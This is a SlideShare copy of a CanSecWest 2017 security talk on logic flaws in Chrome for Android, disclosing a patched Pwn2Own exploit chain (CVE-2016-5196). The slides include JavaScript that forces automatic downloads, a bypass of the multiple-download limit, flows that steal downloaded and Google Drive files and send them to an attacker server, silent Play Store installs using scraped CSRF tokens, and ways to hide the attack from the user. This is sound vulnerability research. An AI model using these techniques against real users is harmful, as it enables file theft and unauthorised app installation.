SlideShare a Scribd company logo

CSW2017 Geshev+Miller logic bug hunting in chrome on android

CanSecWest
CanSecWest

The document describes several logic flaws in Chrome on Android that could be exploited. It discusses exploiting automatic file downloads to steal downloaded files or files from Google Drive by tricking the browser into downloading malicious files. It also describes using cross-site request forgery tokens and device IDs to programmatically install arbitrary apps from the Google Play store. The presentation aims to show how understanding application logic can lead to powerful "logic bug" exploits beyond simple memory corruption issues.

1 of 73
Download to read offline
Logic Bug Hunting in Chrome on Android CanSecWest 17 March, 2017
Agenda • Fuzzing and memory corruptions • Introduction to logic flaws • General approach to hunting logic bugs • Application in Mobile Pwn2Own 2016 • Exploit improvement
Tindroductions
Fuzzing and Pwn2Own • Fuzzing has become mainstream • AFL, LibFuzzer, Radamsa, Honggfuzz, etc. • It’s almost too easy… • People find and kill bugs they rarely understand… • Increasing likelihood of duplicates • libstagefright, Chrome, etc. • Code changes • Improved exploit mitigations
Android Mitigations • More and better security mechanisms • Improved rights management, SELinux, TrustZone • ASLR, DEP, PIE, RELRO, PartitionAlloc, Improved GC • Significant increase in exploit development time • Multiple bugs are usually chained together • PoC isn’t enough for the competition • We can’t afford spending too much time on Pwn2Own
Memory Corruptions vs. Logic Flaws • Memory corruptions • Programming errors • Memory safety violations • Architecture-dependent • General mitigations • Logic flaws • Design vulnerabilities • Intended behaviour • Architecture-agnostic • Lack of general mitigation mechanisms
We Love Logic Bugs • Equally beautiful and hilarious vectors • Basic tools • Actual exploits might be somewhat convoluted Q: How many bugs do you have in your chain? A: We abuse one and a half features. Q: What tool did you use to find that bug? A: Notepad.
It’s not just us…
It’s not just us…
It’s not just us…
It’s not just us…
Identifying Logic Flaws • I don’t know what I’m doing… • Lack of one-size-fits-all methodology • Thou shalt know thy target • Less known or obscure features • Trust boundaries and boundary violations • Threat modelling
Mobile Pwn2Own 2016
Mobile Pwn2Own 2016
Mobile Pwn2Own 2016 ✘
Mobile Pwn2Own 2016 “All entries must compromise the devices by browsing to web content […] or by viewing/receiving an MMS/SMS message.” http://zerodayinitiative.com/MobilePwn2Own2016Rules.html Category Phone Price (USD) Obtaining Sensitive Information Apple iPhone $50,000 Google Nexus $50,000 Samsung Galaxy $35,000 Install Rogue Application Apple iPhone $125,000 Google Nexus $100,000 Samsung Galaxy $60,000 Force Phone Unlock Apple iPhone $250,000
Where do we start? • Ruling out SMS/MMS • Limited to media rendering bugs • Chrome • Core components • URI handlers • IPC to other applications
Google Admin • Case study from 2015
Google Admin <activity android:name="com.google.android.apps. enterprise.cpanel.activities.ResetPinActivity"> <intent-filter> <action android:name="android.intent.action.VIEW"/> <category android:name="android.intent.category.DEFAULT"/> <category android:name="android.intent.category.BROWSABLE"/> <data android:host="localhost" android:scheme="http"/> </intent-filter> </activity> AndroidManifest.xml
Google Admin public void onCreate(Bundle arg3) { this.c = this.getIntent().getExtras().getString("setup_url"); this.b.loadUrl(this.c); // ... } ResetPinActivity.java
Google Admin • Attacking with malware adb shell am start –d http://localhost/foo -e setup_url file:////data/data/com.malware/file.html
Google Admin Chrome file:///tmp/foo.html Uncaught DOMException: Blocked a frame with origin "null" from accessing a cross-origin frame. <HTML><BODY> <IFRAME SRC="file:///tmp/foo.html" id="foo" onLoad="console.log(document.getElementById('foo').contentDocument.body.innerHTML);"> </IFRAME> </BODY></HTML>
Google Admin Chrome on Android API 17 file:///sdcard/foo.html Yep, that’s fine! <HTML><BODY> <IFRAME SRC="file:///sdcard/foo.html" id="foo" onLoad="console.log(document.getelementById('foo').contentDocument.body.innerHTML);"> </IFRAME> </BODY></HTML>
Google Admin • Malicious app creates a world readable file, e.g. foo.html • foo.html will load an iframe with src = “foo.html” after a small delay • Sends a URL for foo.html to Google Admin via IPC • Change foo.html to be a symbolic link pointing to a file in the Google Admin’s sandbox • Post file contents back to a web server
Same-Origin Policy • Chrome for Android vs. Chrome • Different SOP • Custom Android schemes • Worth investigating…
SOP in Chrome for Android HTTP / HTTPS Scheme, domain and port number must match. FILE Full file path for origin until API 23. Starting with API 24, all origins are now NULL. CONTENT Scheme, domain and port number must match. DATA All origins are NULL.
Jumping Origins HTTP / HTTPS FILE CONTENT DATA HTTP / HTTPS ✓ ✘ ✓ ✓ FILE ✓ ✓ ✓ ✓ CONTENT ✓ ✘ ✓ ✓ DATA ✓ ✘ ✓ ✓ Destination Scheme SourceScheme
Android Content Providers • Implement data repositories • Exportable for external access • Declared in AndroidManifest.xml • Read and write access control • Content URIs • Combination of ‘authority’ and ‘path’ • content://<authority><path> • content://downloads/my_downloads/45 • What about SOP?
Android Download Manager • System service that handles long-running HTTP downloads • Back to SOP… content://downloads/my_downloads/45 content://downloads/my_downloads/46 content://downloads/my_downloads/102
Automatic File Downloads • Thank you, HTML5! • Confirmed to work in Chrome • <a href=“foo.html” download> • <a href=“foo.html” download=“bar.html"> • Zero user interaction • Link click using JavaScript • Perfect for Pwn2Own
Automatic File Downloads <a id='foo' href='evil.html' download> link </a> <script> document.getElementById('foo').click(); </script>
Exploit #1 – Stealing Downloaded Files GET /index.html index.html Attacker’s Web Server Victim’s Browser Android Download Manager
Exploit #1 – Stealing Downloaded Files GET /index.html index.html https://attacker.com/index.html Attacker’s Web Server Victim’s Browser Android Download Manager
Exploit #1 – Stealing Downloaded Files GET /index.html index.html GET /evil.html evil.html (download) evil.html (download) Attacker’s Web Server Victim’s Browser Android Download Manager
Exploit #1 – Stealing Downloaded Files GET /index.html index.html GET /evil.html evil.html (download) evil.html (download) https://attacker.com/index.html Attacker’s Web Server Victim’s Browser Android Download Manager
Exploit #1 – Stealing Downloaded Files GET /index.html index.html GET /evil.html evil.html (download) evil.html (download) GET my_downloads/54 evil.html Attacker’s Web Server Victim’s Browser Android Download Manager
Exploit #1 – Stealing Downloaded Files GET /index.html index.html GET /evil.html evil.html (download) evil.html (download) GET my_downloads/54 evil.html content://downloads/my_downloads/54 Attacker’s Web Server Victim’s Browser Android Download Manager
Exploit #1 – Stealing Downloaded Files GET /index.html index.html GET /evil.html evil.html (download) evil.html (download) GET my_downloads/54 evil.html GET my_downloads/53 secrets.pdf secrets.pdf Attacker’s Web Server Victim’s Browser Android Download Manager
Mobile Pwn2Own 2016 Category Phone Price (USD) Obtaining Sensitive Information Apple iPhone $50,000 Google Nexus $50,000 Samsung Galaxy $35,000 Install Rogue Application Apple iPhone $125,000 Google Nexus $100,000 Samsung Galaxy $60,000 Force Phone Unlock Apple iPhone $250,000
Exploit Enhancement • Downloading arbitrary files • User sessions <a id='foo' href='https://drive.google.com/my_drive.html' download> link </a> <script> document.getElementById('foo').click(); </script>
Multiple File Downloads • Multiple automatic downloads from the same page are forbidden
Multiple File Downloads Restriction Bypass • However… page1.html page2.html <meta http-equiv="refresh" content="0; url=page2.html" /> <script> window.history.back(); </script>
evil.html (download) Exploit #2 – Stealing Google Drive Files GET my_downloads/54 evil.html Attacker’s Web Server Google Drive Web Server Victim’s Browser Android Download Manager
evil.html (download) Exploit #2 – Stealing Google Drive Files GET my_downloads/54 evil.html Attacker’s Web Server Google Drive Web Server Victim’s Browser Android Download Manager content://downloads/my_downloads/54
evil.html (download) my_drive.html (download) GET /my_drive.html Exploit #2 – Stealing Google Drive Files GET my_downloads/54 evil.html Attacker’s Web Server Google Drive Web Server Victim’s Browser Android Download Manager
evil.html (download) my_drive.html (download) GET /my_drive.html Exploit #2 – Stealing Google Drive Files GET my_downloads/54 evil.html GET my_downloads/55 my_drive.html my_drive.html (download) Attacker’s Web Server Google Drive Web Server Victim’s Browser Android Download Manager
evil.html (download) my_drive.html (download) GET /my_drive.html Exploit #2 – Stealing Google Drive Files GET my_downloads/54 evil.html GET my_downloads/55 my_drive.html my_drive.html (download) bounce.html GET /bounce.html Attacker’s Web Server Google Drive Web Server Victim’s Browser Android Download Manager https://attacker.com/bounce.html
evil.html (download) my_drive.html (download) GET /my_drive.html Exploit #2 – Stealing Google Drive Files GET my_downloads/54 evil.html GET my_downloads/55 my_drive.html my_drive.html (download) bounce.html history.back(); GET /bounce.html Attacker’s Web Server Google Drive Web Server Victim’s Browser Android Download Manager content://downloads/my_downloads/54
evil.html (download) my_drive.html (download) GET /my_drive.html Exploit #2 – Stealing Google Drive Files GET my_downloads/54 evil.html GET my_downloads/55 my_drive.html my_drive.html (download) bounce.html GET /img?id=12345678 img_foo.jpg (download) history.back(); GET /bounce.html Attacker’s Web Server Google Drive Web Server Victim’s Browser Android Download Manager
evil.html (download) my_drive.html (download) GET /my_drive.html Exploit #2 – Stealing Google Drive Files GET my_downloads/54 evil.html GET my_downloads/55 my_drive.html my_drive.html (download) bounce.html GET /img?id=12345678 img_foo.jpg (download) POST /exfiltrate history.back(); img_foo.jpg (download) GET my_downloads/56 my_drive.html GET /bounce.html Attacker’s Web Server Google Drive Web Server Victim’s Browser Android Download Manager
LLL TTT TTT LLL TTT TTT LLL TTT TTT mMMMm.mMMm. AAAAa. LLL .cCCCCc .oOOo. NNNNNn. TTTTTT .eEEe. NNNNNn. TTTTTT MMM "MMM "MMm "AAa LLL cCCC" oOO""OOo NNN "NNn TTT eEE EEe NNN "NNn TTT MMM MMM MMM .aAAAAAA LLL ====== CCC OOO OOO NNN NNN TTT EEEEEEEE NNN NNN TTT MMM MMM MMM AAA AAA LLL CCCc. oOO..OOo NNN NNN tTTt. EEe. NNN NNN TTTt. MMM MMM MMM "YAAAAAA LLL "CCCCCc "OOOO" NNN NNN "tTTT "EEEEE NNN NNN "TTTT
Drive Files Download Demo
Mobile Pwn2Own 2016 Category Phone Price (USD) Obtaining Sensitive Information Apple iPhone $50,000 Google Nexus $50,000 Samsung Galaxy $35,000 Install Rogue Application Apple iPhone $125,000 Google Nexus $100,000 Samsung Galaxy $60,000 Force Phone Unlock Apple iPhone $250,000
Bettererer Exploit • We can also make POST requests • Download pages containing CSRF token • Use CSRF token in POST request • We’ve got everything now…
Exploit #3 – Install APK from Play Store • Grab a CSRF token https://play.google.com/store • Grab victim’s device ID sa https://play.google.com/settings • Install APK via POST request using CSRF token and device ID function(){window._uc='[x22Kx1pa-cDQOe_1C6Q0J2ixtQT22:1477462478689x22, x220x22, x22enx22,x22GBx22, <tr class="excPab-rAew03" id="g1921daaeef107b4" data-device-id=" g1921daaeef107b4" data-nickname="" data-visible="true" jsname="fscTHd"> id=com.mylittlepony.game&device=g1921daaeef107b4&token=Ka1pa- dDQOe_1C6Q0J2ixtQT32:1477462478689 https://play.google.com/store/install?authuser=0
Exploit #3 – Install APK from Play Store evil.html Attacker’s Web Server Google Play Web Server Victim’s Browser Android Download Manager
Exploit #3 – Install APK from Play Store evil.html Attacker’s Web Server Google Play Web Server Victim’s Browser Android Download Manager content://downloads/my_downloads/54
store.html (download) GET /store.html Exploit #3 – Install APK from Play Store evil.html store.html (download) GET /bounce.html bounce.html Attacker’s Web Server Google Play Web Server Victim’s Browser Android Download Manager https://attacker.com/bounce.html
store.html (download) GET /store.html Exploit #3 – Install APK from Play Store evil.html store.html (download) history.back(); GET /bounce.html bounce.html Attacker’s Web Server Google Play Web Server Victim’s Browser Android Download Manager content://downloads/my_downloads/54
store.html (download) GET /store.html GET my_downloads/55 store.html settings.html (download) GET /settings.html Exploit #3 – Install APK from Play Store evil.html store.html (download) history.back(); settings.html (download) GET /bounce.html bounce.html Attacker’s Web Server Google Play Web Server Victim’s Browser Android Download Manager
store.html (download) GET /store.html GET my_downloads/55 store.html POST /install settings.html (download) GET /settings.html Exploit #3 – Install APK from Play Store evil.html store.html (download) history.back(); settings.html (download) GET /bounce.html bounce.html Attacker’s Web Server Google Play Web Server Victim’s Browser Android Download Manager GET my_downloads/56 settings.html
Mobile Pwn2Own 2016 Category Phone Price (USD) Obtaining Sensitive Information Apple iPhone $50,000 Google Nexus $50,000 Samsung Galaxy $35,000 Install Rogue Application Apple iPhone $125,000 Google Nexus $100,000 Samsung Galaxy $60,000 Force Phone Unlock Apple iPhone $250,000
Keep calm and… aw, snap! • Pending Chrome update?! • Automatic updates failed us • Segmentation fault from AJAX requests • Never had time to investigate • Can still use HTML forms to POST back • Absolute mess compared to AJAX
Where did this bug feature come from?
Exploit Improvement • Removing Pwn2Own debugging • Completely removing AJAX • Moving the bulk of the logic off to the agent • Intelligent agent • Less C&C traffic • Hiding malicious activities from the user
Changing Focus • Prompt for redirecting to another application • Media players, PDF readers and other applications • <a href=‘rtsp://sexy.time.gov.uk/cam1’>Click me!</a> • In focus test in JavaScript • document.hidden == true
Toasts • Small popups at the bottom of the screen • Automatic file downloads • “Downloading…”
Fasterer and Stealthierer
Going Further • Wait for the screen to get locked? • JS is slightly delayed when the browser isn’t in focus, or the lock screen is activated • Loop JS function every 100 ms • Test time passed since last function call
How realistic is this? 700 750 800 850 900 950 1000 1050 1100 Minimised
How realistic is this? 700 750 800 850 900 950 1000 1050 1100 Minimised Locked
The Patch • CVE-2016-5196 • Chromium Bug ID 659492 • The content scheme is now a local scheme • Similar to file:// scheme • Cannot redirect from http:// to content:// • Cannot read other content:// files
Conclusion • Hunting logic flaws can be rewarding • Outside-the-box thinking • Creativity exercise

Recommended

CSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application securityCSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application security
CanSecWest
 
Csw2016 chaykin having_funwithsecuremessengers_and_androidwear
Csw2016 chaykin having_funwithsecuremessengers_and_androidwearCsw2016 chaykin having_funwithsecuremessengers_and_androidwear
Csw2016 chaykin having_funwithsecuremessengers_and_androidwear
CanSecWest
 
Csw2016 freingruber bypassing_application_whitelisting
Csw2016 freingruber bypassing_application_whitelistingCsw2016 freingruber bypassing_application_whitelisting
Csw2016 freingruber bypassing_application_whitelisting
CanSecWest
 
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCsw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
CanSecWest
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CanSecWest
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
EC-Council
 
Csw2016 wang docker_escapetechnology
Csw2016 wang docker_escapetechnologyCsw2016 wang docker_escapetechnology
Csw2016 wang docker_escapetechnology
CanSecWest
 
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud Xiao
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud XiaoFruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud Xiao
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud Xiao
Shakacon
 

Recommended

CSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application securityCSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application security
CanSecWest
 
Csw2016 chaykin having_funwithsecuremessengers_and_androidwear
Csw2016 chaykin having_funwithsecuremessengers_and_androidwearCsw2016 chaykin having_funwithsecuremessengers_and_androidwear
Csw2016 chaykin having_funwithsecuremessengers_and_androidwear
CanSecWest
 
Csw2016 freingruber bypassing_application_whitelisting
Csw2016 freingruber bypassing_application_whitelistingCsw2016 freingruber bypassing_application_whitelisting
Csw2016 freingruber bypassing_application_whitelisting
CanSecWest
 
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCsw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
CanSecWest
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CanSecWest
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
EC-Council
 
Csw2016 wang docker_escapetechnology
Csw2016 wang docker_escapetechnologyCsw2016 wang docker_escapetechnology
Csw2016 wang docker_escapetechnology
CanSecWest
 
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud Xiao
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud XiaoFruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud Xiao
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud Xiao
Shakacon
 
Web security for developers
Web security for developersWeb security for developers
Web security for developers
Sunny Neo
 
Malware collection and analysis
Malware collection and analysisMalware collection and analysis
Malware collection and analysisChong-Kuan Chen
 
Android Application Security
Android Application SecurityAndroid Application Security
Android Application Security
Chong-Kuan Chen
 
Practical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber SecurityPractical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber Security
PRISMA CSI
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules Coverage
Sunny Neo
 
The Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George DobreaThe Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George Dobrea
EC-Council
 
Practical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post ExploitationPractical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post Exploitation
PRISMA CSI
 
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
CODE BLUE
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingCNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
Sam Bowne
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
Sunny Neo
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X Way
Stephan Borosh
 
1000 to 0
1000 to 01000 to 0
1000 to 0
Sunny Neo
 
Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...
Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...
Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...
CODE BLUE
 
Addios!
Addios!Addios!
Addios!
Chong-Kuan Chen
 
Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud Hack
NotSoSecure Global Services
 
Endpoint is not enough
Endpoint is not enoughEndpoint is not enough
Endpoint is not enough
Sumedt Jitpukdebodin
 
BlueHat v18 || Return of the kernel rootkit malware (on windows 10)
BlueHat v18 || Return of the kernel rootkit malware (on windows 10)BlueHat v18 || Return of the kernel rootkit malware (on windows 10)
BlueHat v18 || Return of the kernel rootkit malware (on windows 10)
BlueHat Security Conference
 
Path of Cyber Security
Path of Cyber SecurityPath of Cyber Security
Path of Cyber Security
Satria Ady Pradana
 
BlueHat v18 || Tales from the soc - real-world attacks seen through azure atp...
BlueHat v18 || Tales from the soc - real-world attacks seen through azure atp...BlueHat v18 || Tales from the soc - real-world attacks seen through azure atp...
BlueHat v18 || Tales from the soc - real-world attacks seen through azure atp...
BlueHat Security Conference
 
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
CODE BLUE
 
Zombie browsers spiced with rootkit extensions - DefCamp 2012
Zombie browsers spiced with rootkit extensions - DefCamp 2012Zombie browsers spiced with rootkit extensions - DefCamp 2012
Zombie browsers spiced with rootkit extensions - DefCamp 2012DefCamp
 
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensionsZoltan Balazs
 

More Related Content

What's hot

Web security for developers
Web security for developersWeb security for developers
Web security for developers
Sunny Neo
 
Malware collection and analysis
Malware collection and analysisMalware collection and analysis
Malware collection and analysisChong-Kuan Chen
 
Android Application Security
Android Application SecurityAndroid Application Security
Android Application Security
Chong-Kuan Chen
 
Practical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber SecurityPractical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber Security
PRISMA CSI
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules Coverage
Sunny Neo
 
The Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George DobreaThe Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George Dobrea
EC-Council
 
Practical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post ExploitationPractical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post Exploitation
PRISMA CSI
 
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
CODE BLUE
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingCNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
Sam Bowne
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
Sunny Neo
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X Way
Stephan Borosh
 
1000 to 0
1000 to 01000 to 0
1000 to 0
Sunny Neo
 
Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...
Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...
Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...
CODE BLUE
 
Addios!
Addios!Addios!
Addios!
Chong-Kuan Chen
 
Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud Hack
NotSoSecure Global Services
 
Endpoint is not enough
Endpoint is not enoughEndpoint is not enough
Endpoint is not enough
Sumedt Jitpukdebodin
 
BlueHat v18 || Return of the kernel rootkit malware (on windows 10)
BlueHat v18 || Return of the kernel rootkit malware (on windows 10)BlueHat v18 || Return of the kernel rootkit malware (on windows 10)
BlueHat v18 || Return of the kernel rootkit malware (on windows 10)
BlueHat Security Conference
 
Path of Cyber Security
Path of Cyber SecurityPath of Cyber Security
Path of Cyber Security
Satria Ady Pradana
 
BlueHat v18 || Tales from the soc - real-world attacks seen through azure atp...
BlueHat v18 || Tales from the soc - real-world attacks seen through azure atp...BlueHat v18 || Tales from the soc - real-world attacks seen through azure atp...
BlueHat v18 || Tales from the soc - real-world attacks seen through azure atp...
BlueHat Security Conference
 
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
CODE BLUE
 

What's hot (20)

Web security for developers
Web security for developersWeb security for developers
Web security for developers
 
Malware collection and analysis
Malware collection and analysisMalware collection and analysis
Malware collection and analysis
 
Android Application Security
Android Application SecurityAndroid Application Security
Android Application Security
 
Practical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber SecurityPractical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber Security
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules Coverage
 
The Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George DobreaThe Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George Dobrea
 
Practical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post ExploitationPractical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post Exploitation
 
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingCNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X Way
 
1000 to 0
1000 to 01000 to 0
1000 to 0
 
Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...
Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...
Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...
 
Addios!
Addios!Addios!
Addios!
 
Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud Hack
 
Endpoint is not enough
Endpoint is not enoughEndpoint is not enough
Endpoint is not enough
 
BlueHat v18 || Return of the kernel rootkit malware (on windows 10)
BlueHat v18 || Return of the kernel rootkit malware (on windows 10)BlueHat v18 || Return of the kernel rootkit malware (on windows 10)
BlueHat v18 || Return of the kernel rootkit malware (on windows 10)
 
Path of Cyber Security
Path of Cyber SecurityPath of Cyber Security
Path of Cyber Security
 
BlueHat v18 || Tales from the soc - real-world attacks seen through azure atp...
BlueHat v18 || Tales from the soc - real-world attacks seen through azure atp...BlueHat v18 || Tales from the soc - real-world attacks seen through azure atp...
BlueHat v18 || Tales from the soc - real-world attacks seen through azure atp...
 
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
 

Similar to CSW2017 Geshev+Miller logic bug hunting in chrome on android

Zombie browsers spiced with rootkit extensions - DefCamp 2012
Zombie browsers spiced with rootkit extensions - DefCamp 2012Zombie browsers spiced with rootkit extensions - DefCamp 2012
Zombie browsers spiced with rootkit extensions - DefCamp 2012DefCamp
 
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensionsZoltan Balazs
 
Attacking and Defending Mobile Applications
Attacking and Defending Mobile ApplicationsAttacking and Defending Mobile Applications
Attacking and Defending Mobile Applications
Jerod Brennen
 
Mobile code mining for discovery and exploits nullcongoa2013
Mobile code mining for discovery and exploits nullcongoa2013Mobile code mining for discovery and exploits nullcongoa2013
Mobile code mining for discovery and exploits nullcongoa2013
Blueinfy Solutions
 
[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012
[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012
[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012Zoltan Balazs
 
[Wroclaw #1] Android Security Workshop
[Wroclaw #1] Android Security Workshop[Wroclaw #1] Android Security Workshop
[Wroclaw #1] Android Security Workshop
OWASP
 
Outsmarting SmartPhones
Outsmarting SmartPhonesOutsmarting SmartPhones
Outsmarting SmartPhones
saurabhharit
 
iOS Application Security.pdf
iOS Application Security.pdfiOS Application Security.pdf
iOS Application Security.pdf
Ravi Aggarwal
 
Web-App Remote Code Execution Via Scripting Engines
Web-App Remote Code Execution Via Scripting EnginesWeb-App Remote Code Execution Via Scripting Engines
Web-App Remote Code Execution Via Scripting Engines
c0c0n - International Cyber Security and Policing Conference
 
13 practical tips for writing secure golang applications
13 practical tips for writing secure golang applications13 practical tips for writing secure golang applications
13 practical tips for writing secure golang applications
Karthik Gaekwad
 
Pentesting Mobile Applications (Prashant Verma)
Pentesting Mobile Applications (Prashant Verma)Pentesting Mobile Applications (Prashant Verma)
Pentesting Mobile Applications (Prashant Verma)
ClubHack
 
Android Penetration Testing - Day 3
Android Penetration Testing - Day 3Android Penetration Testing - Day 3
Android Penetration Testing - Day 3
Mohammed Adam
 
I haz you and pwn your maal
I haz you and pwn your maalI haz you and pwn your maal
I haz you and pwn your maalHarsimran Walia
 
HTML5 is the Future of Mobile, PhoneGap Takes You There Today
